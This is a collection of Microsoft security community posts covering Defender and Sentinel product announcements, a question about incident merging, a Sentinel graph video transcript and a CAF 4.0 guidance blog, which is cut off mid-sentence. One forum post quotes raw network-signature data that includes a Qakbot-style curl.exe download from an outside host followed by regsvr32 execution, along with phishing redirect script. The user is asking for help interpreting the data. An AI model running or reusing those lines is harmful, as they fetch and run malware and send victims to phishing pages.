Ignite 2025: What's new in Microsoft Defender?
This Ignite we are focused on giving security teams the edge they need to meet adversaries head on in the era of AI. The modern Security Operations Center (SOC) is undergoing a fundamental transformation, placing AI at the forefront of innovation - not just as an added feature, but as a driving force at every layer of the stack. While much attention is rightly focused on the development of security agents, we fundamentally believe that AI must also evolve the very foundation of our security solutions. This means building solutions that more effectively uncover novel threats, act dynamically to defend the organization during attacks, and reduce the workload for the security team. As organizations adopt AI at an unprecedented speed, we also want to make sure they can do so securely. To meet these security needs of the AI era, we are excited to announce a series of innovations that will help organizations shift to an autonomous defense and an agentic SOC. New agents to help scale and accelerate security operations Evolving Microsoft Defender’s autonomous defense capabilities for better protection Secure your low-code and pro-code AI agents with Microsoft Defender Today, we are taking the first step in shifting security operations from static controls to autonomous defense and from manual toil to agentic operations. But we have an ambitious vision to augment and evolve these AI capabilities and agents across the entire SOC lifecycle and are excited to share some of that vision, as shown in the below graphic, with you at Microsoft Ignite. The Agentic SOC: Scaling expertise and accelerating defense We are excited to introduce four new Security Copilot agents in Microsoft Defender that bring autonomous intelligence across different stages of the SOC lifecycle. These agents combine context, reasoning, and complex workflows to help defenders anticipate attacks sooner, detect smarter, and investigate faster than ever before. Phishing Triage Agent: In March 2025, we introduced the Phishing Triage Agent, built to autonomously handle user-submitted phishing reports at scale. The agent reviews and classifies incoming alerts, resolves false positives and escalates only the malicious cases that require human expertise. Early data shows that analysts working with the agent caught up to 6.5x more malicious emails compared to professional graders. Today, we’re excited to announce that the agent’s triage capabilities will soon extend beyond phishing to cover identity and cloud alerts. Secondly, we are also improving our phish admin reporting process with a new agentic email grading system. It replaces a manual review process with advanced large language models and agentic workflows to deliver rapid, transparent verdicts and clear explanations to customers for every reported email. Learn more about the agentic email grading system. Threat Hunting Agent – this agent reimagines the investigation process. Instead of requiring analysts to master complex query languages or sift through mountains of data, the Threat Hunting Agent enables natural language investigations with contextual insight. Analysts can vibe with the agent by asking questions in plain English, receive direct answers, and be guided through comprehensive hunting sessions. This levels up the current NL2KQL experience by enabling analysts to explore patterns, pivot intuitively and uncover hidden signals in real time for a fluid, context-aware experience. This not only accelerates investigations but makes advanced threat hunting accessible to every member of the SOC, regardless of experience level. Dynamic Threat Detection Agent – One of the hardest challenges in detection engineering is finding and fixing false negatives. The Dynamic Threat Detection Agent proactively hunts for false negatives and blind spots that traditional alerting might miss. When a critical incident happens, Copilot will kick off an automated hunt to uncover undetected threats—like unusual residual activity around a sensitive identity. This agent turns ‘probably fine’ into proven secure—hunting the quiet persistence that slips past alerts and closing the gap before it becomes tomorrow’s breach. Threat Intelligence (TI) Briefing Agent – Now native in the Defender portal. Generate tailored, AI‑authored threat briefings in minutes—synthesizing global intel with your environment’s context—without leaving the incident pane. Figure 1. The Threat Hunting Agent showing insights on an incident that contained a high risk binary To make the agents easily accessible and help security teams get started more quickly, we are excited to announce that Security Copilot will be available to all Microsoft 365 E5 customers. Rollout starts today for existing Security Copilot customers with Microsoft 365 E5 and will continue in the upcoming months for all Microsoft 365 E5 customers. Customers will receive 30-day advanced notification before activation. Learn more. Autonomous Defense at Platform Scale Threat actors are automating everything. Ransomware campaigns can encrypt an entire environment in under an hour. Adversaries evade detection and pivot across identities, endpoints, and cloud resources faster than human teams can triage alerts. Traditional SOC models—built on manual workflows and fragmented tools—simply can’t keep pace. Every second of delay gives attackers an advantage. Microsoft Defender now counters that speed by delivering autonomous defense at scale. Defender shifts security from reactive firefighting to proactive protection, embedding AI into the foundation of our protection solutions for instant detection, disruption, and containment—before threats escalate. In 2023, we introduced automatic attack disruption, which autonomously stops attacks in progress—like ransomware or business email compromise—with policy-bound actions that isolate endpoints, disable compromised accounts, and block malicious IPs at machine speed. Today, we’re taking the next step. New capabilities show how AI and agentic technology are transforming security to better protect customers: Unleash automatic attack disruption across your SIEM data: We are expanding the disruption capabilities of Microsoft Defender to some of the most critical data sources customer connect via Microsoft Sentinel including AWS, Proofpoint and Okta. This enables real-time detection and automatic containment of threats like phishing and identity compromise on top of your log data, fundamentally turning your SIEM into a threat protection solution. While these capabilities leverage the power of our platform, Defender is not a requirement for customers to realize this value in Microsoft Sentinel. Figure 2. Attack disruption initiated on an AWS attack Predictive shielding – This brand-new automatic attack disruption capability activates immediately after an attack is first contained. Our first of its kind capability combines graph insights, AI, and threat intelligence to predict potential attack paths for where the adversary might go next. It then applies just-in-time hardening techniques that proactively block the attacker from pivoting. Some of the hardening tactics that will automatically be applied by Microsoft Defender include disabling SafeBoot and enforcing Group Policy Objects, putting a hard stop to the attacker’s movements and ability to execute common techniques for compromise. Learn more about predictive shielding and other endpoint security news. Protect your low-code and pro-code AI agents Generative AI and agents are rapidly transforming how we work, but these powerful new tools also introduce new risks. And with the democratization of agent creation across pro-code, low-code, and no-code building platforms, building agents is now accessible to everyone, many without extensive developer or security knowledge. To help security teams better manage these risks we are excited to announce that we are extending the capabilities and experiences in Microsoft Defender to the protection of agents. From agent security posture management, to attack path analysis, and threat protection for Copilot Studio, Azure Foundry, and agents built and connected via the Microsoft Agent 365 SDK. Learn more about how Microsoft Defender can help protect your agents against threats like prompt injections and more. There is so much more innovation we are introducing in Microsoft Defender today, including expanded endpoint security coverage for legacy systems, improvements to how you can investigate identity-centric threats, and we are bringing cloud security posture management into the Defender portal. Check out the other Defender news blogs for more details. Join us in San Francisco, November 17–21, or online, November 18–20, for deep dives and practical labs to help you maximize your Microsoft Defender investments and to get more from the Microsoft capabilities you already use. Featured sessions: Microsoft Defender: Building the agentic SOC with guest Allie Mellen Blueprint for building the SOC of the future Empowering the SOC: Security Copilot and the rise of agentic defense Identity Under Siege: Modern ITDR from Microsoft AI vs AI: Protect email and collaboration tools with Microsoft Defender AI-powered defense for cloud workloads Endpoint security in the AI era: What's new in Defender
How to stop incidents merging under new incident (MultiStage) in defender.
Dear All We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal where multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage." This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic. Key concerns include: Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value. Analytic rules arising from different data sources and detection logic are merged, although they represent distinct security events needing separate attention. Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement. We understand that Defender’s incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors but would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable. Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated. Thank you for your assistance. Best regardsMonthly news - December 2025
Microsoft Defender Monthly news - December 2025 Edition This is our monthly "What's new" blog post, summarizing product updates and various new assets we released over the past month across our Defender products. In this edition, we are looking at all the goodness from October 2025. Defender for Cloud has its own Monthly News post, have a look at their blog space. 😎 Microsoft Ignite 2025 - now on-demand! 🚀 New Virtual Ninja Show episode: Advancements in Attack Disruption Vulnerability Remediation Agent in Microsoft Intune Microsoft Defender Ignite 2025: What's new in Microsoft Defender? This blog summarizes our big announcements we made at Ignite. (Public Preview) Defender XDR now includes the predictive shielding capability, which uses predictive analytics and real-time insights to dynamically infer risk, anticipate attacker progression, and harden your environment before threats materialize. Learn more about predictive shielding. Security Copilot for SOC: bringing agentic AI to every defender. This blog post gives a great overview of the various agents supporting SOC teams. Account correlation links related accounts and corresponding insights to provide identity-level visibility and insights to the SOC. Coordinated response allows Defenders to take action comprehensively across connected accounts, accelerating response and minimizing the potential for lateral movement. Enhancing visibility into your identity fabric with Microsoft Defender. This blog describes new enhancements to the identity security experience within Defender that will help enrich your security team’s visibility and understanding into your unique identity fabric. (Public Preview) The IdentityAccountInfo table in advanced hunting is now available for preview. This table contains information about account information from various sources, including Microsoft Entra ID. It also includes information and link to the identity that owns the account. Microsoft Sentinel customers using the Defender portal, or the Azure portal with the Microsoft Sentinel Defender XDR data connector, now also benefit from Microsoft Threat Intelligence alerts that highlight activity from nation-state actors, major ransomware campaigns, and fraudulent operations. For more information, see Incidents and alerts in the Microsoft Defender portal. (Public Preview) New Entity Behavior Analytics (UEBA) experiences in the Defender portal! Microsoft Sentinel introduces new UEBA experiences in the Defender portal, bringing behavioral insights directly into key analyst workflows. These enhancements help analysts prioritize investigations and apply UEBA context more effectively. Learn more on our docs. (Public Preview) A new Restrict pod access response action is now available when investigating container threats in the Defender portal. This response action blocks sensitive interfaces that allow lateral movement and privilege escalation. (Public Preview) Threat analytics now has an Indicators tab that provides a list of all indicators of compromise (IOCs) associated with a threat. Microsoft researchers update these IOCs in real time as they find new evidence related to the threat. This information helps your security operations center (SOC) and threat intelligence analysts with remediation and proactive hunting. Learn more. In addition the overview section of threat analytics now includes additional details about a threat, such as alias, origin, and related intelligence, providing you with more insights on what the threat is and how it might impact your organization. Microsoft Defender for Identity (Public Preview) In addition to the GA release of scoping by Active Directory domains a few months ago, you can now scope by Organizational Units (OUs) as part of XDR User Role-Based Access Control. This enhancement provides even more granular control over which entities and resources are included in security analysis. For more information, see Configure scoped access for Microsoft Defender for Identity. (Public Preview). New security posture assessment: Change password for on-prem account with potentially leaked credentials. The new security posture assessment lists users whose valid credentials have been leaked. For more information, see: Change password for on-prem account with potentially leaked credentials. Defender for Identity is slowly rolling out automatic Windows event auditing for sensors v3.x, streamlining deployment by applying required auditing settings to new sensors and fixing misconfigurations on existing ones. As it becomes available, you will be able to enable automatic Windows event-auditing in the Advanced settings section in the Defender portal, or using the Graph API. Identity Inventory enhancements: Accounts tab, manual account linking and unlinking, and expanded remediation actions are now available. Learn more in our docs. Microsoft Defender for Cloud Apps (Public Preview) Defender for Cloud Apps automatically discovers AI agents created in Microsoft Copilot Studio and Azure AI Foundry, collects audit logs, continuously monitors for suspicious activity, and integrates detections and alerts into the XDR Incidents and Alerts experience with a dedicated Agent entity. For more information, see Protect your AI agents. Microsoft Defender for Endpoint Ignite 2025: Microsoft Defender now prevents threats on endpoints during an attack. This year at Microsoft Ignite, Microsoft Defender is announcing exciting innovations for endpoint protection that help security teams deploy faster, gain more visibility, and proactively block attackers during active attacks. (Public Preview) Defender for Endpoint now includes the GPO hardening and Safeboot hardening response actions. These actions are part of the predictive shielding feature, which anticipates and mitigates potential threats before they materialize. (Public Preview) Custom data collection enables organizations to expand and customize telemetry collection beyond default configurations to support specialized threat hunting and security monitoring needs. (Public Preview) Native root detection support for Microsoft Defender on Android. This enables proactive detection of rooted devices without requiring Intune policies, ensuring stronger security and validating that Defender is running on an uncompromised device, ensuring more reliable telemetry that is not vulnerable to attacker manipulation. (Public Preview) The new Defender deployment tool is a lightweight, self-updating application that streamlines onboarding devices to the Defender endpoint security solution. The tool takes care of prerequisites, automates migrations from older solutions, and removes the need for complex onboarding scripts, separate downloads, and manual installations. It currently supports Windows and Linux devices. Defender deployment tool: for Windows devices for Linux devices (Public Preview) Defender endpoint security solution for Windows 7 SP1 and Windows Server 2008 R2 SP1. A Defender for endpoint security solution is now available for legacy Windows 7 SP1 and Windows Server 2008 R2 SP1 devices. The solution provides advanced protection capabilities and improved functionality for these devices compared to other solutions. The new solution is available using the new Defender deployment tool. Microsoft Defender Vulnerability Management (Public Preview) The Vulnerability Management section in the Microsoft Defender portal is now located under Exposure management. This change is part of the vulnerability management integration to Microsoft Security Exposure Management, which significantly expands the scope and capabilities of the platform. Learn more. (General Availability) Microsoft Secure Score now includes new recommendations to help organizations proactively prevent common endpoint attack techniques. Require LDAP client signing and Require LDAP server signing - help ensure integrity of directory requests so attackers can't tamper with or manipulate group memberships or permissions in transit. Encrypt LDAP client traffic - prevents exposure of credentials and sensitive user information by enforcing encrypted communication instead of clear-text LDAP. Enforce LDAP channel binding - prevents man-in-the-middle relay attacks by ensuring the authentication is cryptographically tied to the TLS session. If the TLS channel changes, the bind fails, stopping credential replay. (General Availability) These Microsoft Secure Score recommendations are now generally available: Block web shell creation on servers Block use of copied or impersonated system tools Block rebooting a machine in Safe Mode Microsoft Defender for Office 365 Microsoft Ignite 2025: Transforming Phishing Response with Agentic Innovation. This blog post summarizes the following announcements: General Availability of the Security Copilot Phishing Triage Agent Agentic Email Grading System in Microsoft Defender Cisco and VIPRE Security Group join the Microsoft Defender ICES ecosystem. A separate blog explains these best practices in more detail and outline three other routing techniques commonly used across ICES vendors. Blog series: Best practices from the Microsoft Community Microsoft Defender for Office 365: Fine-Tuning: This blog covers our top recommendations for fine-tuning Microsoft Defender for Office 365 configuration from hundreds of deployments and recovery engagements, by Microsoft MVP Joe Stocker. You may be right after all! Disputing Submission Responses in Microsoft Defender for Office 365: Microsoft MVP Mona Ghadiri spotlights a new place AI has been inserted into a workflow to make it better… a feature that elevates the transparency and responsiveness of threat management: the ability to dispute a submission response directly within Microsoft Defender for Office 365. Blog post: Strengthening calendar security through enhanced remediation.Build less, secure more: Simplify security data management with Microsoft Sentinel data lake
Most DIY security data lakes start with good intentions—promising flexibility, control, and cost savings. But in reality, they lead to endless data ingestion fixes, schema drift battles, and soaring costs. They fail because they lack the capabilities to manage security data that’s not just massive, but complex, dynamic, and compliance heavy. Ingestion chaos: Every team implements its own pipelines for diverse data sets like firewalls, endpoint, network, threat intelligence feeds, and more. Normalization gaps: Each team uses its own schema; Therefore queries, detections, and ML models can’t be reused. Operational drag: Constant tuning for compression, tiering, and schema evolution. Scaling costs: What began as $1K per month becomes $100K per month as data doubles every quarter. Fragmented analytics: Detection in one data store, hunting in another, and investigation in a third. Security data isn’t just telemetry. It must be unified, normalized, cross-correlated, and enriched with context— in near real time. A security data lake needs more than raw storage—it needs intelligence. You need a centralized platform that goes beyond storing data to deliver actionable insights. Microsoft Sentinel data lake does exactly that. It is more than a storage solution, it’s the foundation for modern, AI-powered security operations. Whether you're scaling your SOC, building deeper analytics, or preparing for future threats, the Sentinel data lake is ready to support your journey. Empowering security teams with a unified, security data lake With Sentinel data lake, there’s no need to build your own security data lake. This fully managed, cloud-native solution—purpose-built for security—redefines how teams manage, analyze, and act on all their security data, cost-effectively. Since its launch, organizations across industries have embraced Sentinel data lake for its transformative impact on security operations. Customers highlight its ability to unify data from diverse sources, enabling faster threat detection and deeper investigations. Cost efficiency is a standout benefit, thanks to tiered storage and flexible retention options that help reduce expenses. With petabytes of data already ingested, users are gaining real-time and historical insights at scale—empowering security teams like never before. Sentinel data lake advantages Sentinel data lake allows multiple analytics engines like Kusto, Spark, and ML to run on a single copy of data, simplifying management, reducing costs, and supporting deeper security analysis. Security-aware data model: Out-of-the-box normalization aligned to the Microsoft Security graph schema, Kusto Query Language (KQL) and Structured Query Language (SQL). Native integration: Directly connects to Sentinel graph, Security Copilot, and Model Context Protocol (MCP) Tools with no ETL or duplication. Query at any scale: Store petabytes, query in seconds using both KQL and SQL endpoints. Governance by design: Inherits Fabric’s unified data governance, lineage, and RBAC already secured for compliance. AI-ready: Enables natural-language hunting and threat reasoning through Security Copilot agents over the same data. In short, Sentinel data lake is a data fabric, built for security. Why does this matter? It matters because the advantages of a data lake for security are only realized when all the security data is: Unified: No more fragmented analytics across multiple silos. Normalized: Consistent schema for queries, detections, and ML models. Scalable: Elastic compute and storage without manual tuning. Integrated: Works seamlessly with SIEM, SOAR, and AI tools. Governed: Compliance and RBAC baked in from day one. AI-Enhanced: Enables graph-based reasoning and MCP tool integration for advanced threat detection. Sentinel delivers all of this and much more without the operational burden. Get started with Microsoft Sentinel data lake today Connect Your Data Sources Start by plugging into your existing security telemetry. Sentinel provides built-in connectors for Microsoft 365, Defender, Entra, and many third-party tools. Instead of writing custom ingestion scripts or managing brittle pipelines, data flows automatically into your Sentinel data lake workspace. This means your SOC can begin analyzing logs within minutes, not weeks. No schema headaches and no manual ETL. Just secure, governed ingestion at scale. Query Natively Using KQL or SQL Once your data is in the lake, you can query it natively using Kusto Query Language (KQL) or SQL. This dual-query capability is a game changer because analysts can pivot from detection to investigation to hunting without exporting or rehydrating data. Imagine running a KQL query to find suspicious sign-ins, then switching to SQL for a compliance report on the same dataset. No duplication and no latency. It is analytics without boundaries. Build Cross-System Analytics Your SOC does not operate in isolation. Many organizations run multiple SIEMs such as Splunk, QRadar, or Chronicle alongside Sentinel. With Sentinel data lake, you can centralize normalized data and expose it through open APIs and Delta Parquet. This allows you to build cross-system analytics without painful data wrangling. Want to correlate a Splunk alert with Defender telemetry? Or enrich Chronicle detections with Microsoft threat intelligence? Sentinel data lake makes it possible in a secure and scalable way. Enable AI and Graph Intelligence Security is not just about raw data, it is about context. Sentinel data lake integrates with Sentinel graph, enabling relational reasoning across entities like users, devices, IPs, and alerts. Add Security Copilot and MCP Tools, and you unlock AI-driven hunting and threat reasoning. Scale Confidently Finally, scale without fear. Traditional DIY lakes demand constant tuning for partitioning, compression, and schema evolution. Sentinel data lake, built on Microsoft Fabric, handles elasticity for you. Whether you are ingesting gigabytes or petabytes, compute and storage scale automatically. No more late-night calls to fix performance bottlenecks. No more surprise bills from uncontrolled growth. You get predictable performance and cost efficiency so your team can focus on threats, not plumbing. A new chapter for security teams For years, security engineers have poured countless hours into building and maintaining custom data lakes. They have stitched together pipelines, fought schema drift, and tuned performance just to keep the lights on. Every new data source or compliance requirement meant starting the cycle all over again. This is exhausting, and it distracts teams from what truly matters: stopping threats. Sentinel data lake changes that story. Instead of spending nights fixing ingestion scripts or weekends scaling storage, you can focus on AI-powered detection, investigation, and response. The heavy lifting is already done for you. Your data is unified, queryable, and ready for AI-driven insights the moment it lands. This is not just another tool. It is a foundation for modern security operations. A data lake that speaks the language of security, integrates with the multi-cloud, multiplatform ecosystems, and scales as fast as your data grows. No more plumbing. No more patchwork. Just a clear path to faster threat detection and smarter defense. The old way was about building. The new way is about protecting. Microsoft Sentinel data lake was built so you can do exactly that. Get started today Microsoft Sentinel—AI-Ready Platform | Microsoft Security Sentinel data lake onboarding Microsoft Sentinel data lake is now generally available | Microsoft Community Hub Microsoft Sentinel data lake FAQ | Microsoft Community Hub Plan costs and understand pricing and billing - Microsoft Sentinel | Microsoft Learn Microsoft Sentinel data lake ninja training Behind this post are the brilliant minds of vkokkengada chaitra_satish whose ideas inspired this content. Proud to share their expertise with a wider audience.Microsoft Sentinel platform — Unified, Graph-enabled, and AI-ready Security
Visualize relationships across users, devices, and resources to pinpoint vulnerabilities and focus your response where it matters most. Using natural language, you can investigate faster. Ask questions, get context, and act on insights without writing complex queries. Build and extend your own identity graphs to include multicloud systems like Salesforce, enriching your view of risk. Vandana Mahtani, Microsoft Sentinel Principal PM, shares how to detect, investigate, and disrupt threats in one connected experience with Microsoft Sentinel. You can find more info on custom graphs: https://aka.ms/sentinel/graph/ignite and sign-up for preview at: https://aka.ms/sentinel/graph/customsignup Understand and mitigate risks. Connect the dots across users, devices, and resources with blast radius analysis in Sentinel graph. Take a look. Ask questions in natural language. Let the Sentinel MCP server analyze user activities across connected services. See it here. Create custom identity graphs. Map multicloud risk, detect high-risk users, and safeguard critical systems. Check out Microsoft Sentinel platform. QUICK LINKS: 00:00 — Microsoft Sentinel SIEM and AI-ready security platform 01:37 — Blast radius integration 02:34 — Investigate using AI with the Sentinel MCP server 03:40 — Advanced hunting 04:53 — Custom graphs 07:07 — Build your own custom graph 08:51 — Wrap up Link References For more information, visit https://aka.ms/sentinelplatform Custom graph public preview signup at https://aka.ms/sentinel/graph/customsignup Unfamiliar with Microsoft Mechanics? As Microsoft’s official video series for IT, you can watch and share valuable content and demos of current and upcoming tech from the people who build it at Microsoft. Subscribe to our YouTube: https://www.youtube.com/c/MicrosoftMechanicsSeries Talk with other IT Pros, join us on the Microsoft Tech Community: https://techcommunity.microsoft.com/t5/microsoft-mechanics-blog/bg-p/MicrosoftMechanicsBlog Watch or listen from anywhere, subscribe to our podcast: https://microsoftmechanics.libsyn.com/podcast Keep getting this insider knowledge, join us on social: Follow us on Twitter: https://twitter.com/MSFTMechanics Share knowledge on LinkedIn: https://www.linkedin.com/company/microsoft-mechanics/ Enjoy us on Instagram: https://www.instagram.com/msftmechanics/ Loosen up with us on TikTok: https://www.tiktok.com/@msftmechanics Video Transcript: -What if your security tools could not only detect threats, but understand them? What if they could reason over your entire digital estate, connect the dots between disconnected security signals, and predict where attackers might go next? All of this is now possible with Microsoft Sentinel, which is now more powerful, as it has evolved to be both a SIEM and an AI-ready security platform. Let’s break this down. At the foundation, Sentinel data lake unifies all your data in one place to enrich your investigations. Hundreds of available connectors help you bring in your security data wherever it resides. Risk signals contained in security data from different systems come together in the new Sentinel graph. -Here, real-time threat intelligence, like suspicious sign-ins and risky network activity, is mapped with the relationships identified across entities, from your users, devices, and resources across your entire digital estate, to reveal the potential attack paths or overall blast radius and more, so that you can understand the risk posed to critical assets. And you can perform complex queries using natural language enabled by the Sentinel MCP server that serves as a powerful gateway for AI to retrieve structured context to reason over all of your security data: from tabular and relational, to graph-based and vector-based semantic data, ultimately helping you detect, investigate, and disrupt threats faster. Let me make this real by first showing you the transformed experience for incident investigation. -The experience starts with Microsoft Defender, where you can easily access Microsoft Sentinel capabilities. I’m going to navigate to my active incidents. I’m interested in this multi-stage attack, and I can straight-away see that a user Mark Gafarova’s credentials have been compromised. In the past, figuring out where the attacker would go next would take a lot of extra hunting which you may not have the luxury of time for. With the new blast radius integration powered by Sentinel graph, we can quickly see the potential attack paths the attacker could take to get to critical assets, like the wg-prod key vault, which would escalate the severity of the attack by providing access to critical assets and data. As you saw, with Sentinel graph working behind the scenes, connecting the dots is faster when timing is critical. Now that we know the target of the attack and the potential assets at risk, we can customize our investigation using AI with the Sentinel MCP server. -Here I have a chat agent that my company Zava has built using GitHub Copilot. It’s connected to the Sentinel MCP server. Even though we know this incident has flagged Mark as potentially being compromised, I want to understand more about Mark. In the past, I would have had to be competent in Kusto querying to start to build a picture, but I can now just pose a question in natural language and replace multiple queries with a single question. I’ll ask, “What do we know about user Mark Gafarova and his actions?” And as you can see, this agent first connects to the MCP server, then performs a series of semantic searches and Kusto queries, then reasons over the retrieved data to analyze the user’s activities and checks for risk events across connected services. And we can see it’s found all of Mark’s recent activities and we know more about his activities before we revoke his access to resources. -With more clues in hand, we can now move on to more advanced hunting using the new hunting graph. We just saw that the wg-prod key vault looked accessible by our attackers. In fact, this visual shows us other accounts that have access. Our high privilege account, Malin on the right, is well protected using phishing-resistant authentication, so they are more immune to an attacker. But Laura Hanak on the left and Alberto Polak on top are standard business users, so let’s find out first if Laura’s account was compromised. I’ll move back to our agent and prompt it with, “Show me the blast radius from Laura Hanak,” and it identifies all the resources that Laura’s account can access along with what is at risk, like our key vault production environment, security infrastructure, automation systems, and AI/ML platforms. It also presents recommendations of what to do to lock down these at-risk resources and monitor them. And I can keep going for more information. I’ll ask, “Why is this risky?” And it generates a detailed security analysis with different attack risks and their tactics, techniques and protocols for each. So, graphs are a powerful way to investigate risk in your environment. In some cases, you may want to use custom graphs enriched with specific data. -For example, you might want to understand if attack risk from an incident extends to your CRM system, like Salesforce using your favorite opensource graph, or even build your own. Here we’ve ingested Salesforce data into Sentinel data lake via the available connector, which allows for higher fidelity relationship mapping to instantiate a custom multicloud identity graph, and that our agent is connected to. -This time I’ll ask, “Can you analyze Alberto Polak using the custom identity graph. Is there risk to Salesforce?” And the agent uses the identity graph. It’s getting information to understand potential attack paths. Then it finds the blast radius specific to Alberto. Then it’s searching for Salesforce-specific connections and runs more queries in different ways against the data lake. You’ll see that it found Alberto to be high risk based on his access level. We can see clearly that Alberto is a Helpdesk Tier 1 admin with admin rights, who can delegate privileges to other accounts and even APIs and perform remote script execution. This goes beyond information that can be queried in Microsoft Entra ID. This could lead to privilege escalation and bulk data exfiltration via API data sync. -Under Direct Salesforce Risk, it lists risky things that his account can do: managing users, modifying all data, and again the API privileges. Then it highlights attack scenarios with single sign-on compromise and the API. Lastly, it gives great immediate recommendations. These ones are at a critical level focused on reducing Alberto’s access levels, including his group memberships, enabling just-in-time elevation to limit standing privileges, and auditing connected apps to make sure they have not been compromised. Then in high priority recommendations, these themes are reiterated at a more zoomed-in level for specific parameters, activities, and assets. -Next, let me show you more of the details behind building your own custom graph that works with your data in the Sentinel data lake. Here I’m in Visual Studio Code using the Microsoft Sentinel extension, and I’m building a graph similar to what we just saw with Salesforce data. This uses Spark SQL queries to create graph nodes and edges as entities to pull in. The graph assembly step connects everything together so that we can instantiate the graph itself, and after that we can query it. There’s an initial prerequisite and connection step to install the client, then connect and authenticate to our tenant. -Then in step 1, we’re adding all of our relevant Microsoft and Azure nodes, like SQL instances, users, and groups. Below that, you’ll see our connections to Salesforce nodes, with tenant, user, and administrator details. Then we’re defining edges for each and mapping the different keys together to form the relationships and bring the data together first in Azure and Entra, then with the same types of information in Salesforce, as well as mapping Entra objects with Salesforce objects in the respective directories. -Now that we’ve defined everything, the second step is to build the actual graph using the ingredients and relationships defined in the previous step, and finally instantiate our custom graph. And with everything built out, we can test it with a few queries from the notebook. Here, for example, we’re looking for shortest paths from a specific user to Salesforce privileged nodes. And in this case, we’re testing again with Alberto Polak, and from there, we’ve also run a few different types of queries. So with the graph tested, it’s ready to be used as a grounding source of data for our agent. -With Microsoft Sentinel, you now have what you need to extend visibility across your environment and detect, investigate, understand, and disrupt active security threats faster from one single platform. To learn more, visit aka.ms/sentinelplatform, and keep watching Microsoft Mechanics for the latest tech updates. Thanks for watching!
NetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.Security Guidance Series: CAF 4.0 Building Proactive Cyber Resilience
It’s Time To Act Microsoft's Digital Defense Report 2025 clearly describes the cyber threat landscape that this guidance is situated in, one that has become more complex, more industrialized, and increasingly democratized. Each day, Microsoft processes more than 100 trillion security signals, giving unparalleled visibility into adversarial tradecraft. Identity remains the most heavily targeted attack vector, with 97% of identity-based attacks relying on password spray, while phishing and unpatched assets continue to provide easy routes for initial compromise. Financially motivated attacks, particularly ransomware and extortion, now make up over half of global incidents, and nation-state operators continue to target critical sectors, including IT, telecommunications, and Government networks. AI is accelerating both sides of the equation: enhancing attacker capability, lowering barriers to entry through open-source models, and simultaneously powering more automated, intelligence-driven defence. Alongside this, emerging risks such as quantum computing underline the urgency of preparing today for tomorrow’s threats. Cybersecurity has therefore become a strategic imperative shaping national resilience and demanding genuine cross-sector collaboration to mitigate systemic risk. It is within this environment that UK public sector organizations are rethinking their approach to cyber resilience. As an Account Executive Apprentice in the Local Public Services team here at Microsoft, I have seen how UK public sector organizations are rethinking their approach to cyber resilience, moving beyond checklists and compliance toward a culture of continuous improvement and intelligence-led defence. When we talk about the UK public sector in this series, we are referring specifically to central government departments, local government authorities, health and care organizations (including the NHS), education institutions, and public safety services such as police, fire, and ambulance. These organizations form a deeply interconnected ecosystem delivering essential services to millions of citizens every day, making cyber resilience not just a technical requirement but a foundation of public trust. Against this backdrop, the UK public sector is entering a new era of cyber resilience with the release of CAF 4.0, the latest evolution of the National Cyber Security Centre’s Cyber Assessment Framework. This guidance has been developed in consultation with national cyber security experts, including the UK’s National Cyber Security Centre (NCSC), and is an aggregation of knowledge and internationally recognized expertise. Building on the foundations of CAF 3.2, this update marks a decisive shift, like moving from a static map to a live radar. Instead of looking back at where threats once were, organizations can now better anticipate them and adjust their digital defences in real time. For the UK’s public sector, this transformation could not be timelier. The complexity of digital public services, combined with the growing threat of ransomware, insider threat, supply chain compromise, and threats from nation state actors, demands a faster, smarter, and more connected approach to resilience. Where CAF 3.2 focused on confirming the presence and effectiveness of security measures, CAF 4.0 places greater emphasis on developing organizational capability and improving resilience in a more dynamic threat environment. While the CAF remains an outcome-based framework, not a maturity model, it is structured around Objectives, Principles, and Contributing Outcomes, with each contributing outcome supported by Indicators of Good Practice. For simplicity, I refer to these contributing outcomes as “controls” throughout this blog and use that term to describe the practical expectations organizations are assessed against. CAF 4.0 challenges organizations not only to understand the threats they face but to anticipate, detect, and respond in a more informed and adaptive way. Two contributing outcomes exemplify this proactive mindset: A2.b Understanding Threat and C2 Threat Hunting. Together, they represent what it truly means to understand your adversaries and act before harm occurs. For the UK’s public sector, achieving these new objectives may seem daunting, but the path forward is clearer than ever. Many organizations are already beginning this journey, supported by technologies that help turn insight into action and coordination into resilience. At Microsoft, we’ve seen how tools like E3, E5, and Sentinel are already helping public sector teams to move from reactive to intelligence-driven security operations. Over the coming weeks, we’ll explore how these capabilities align to CAF 4.0’s core principles and share practical examples of how councils can strengthen their resilience journey through smarter visibility, 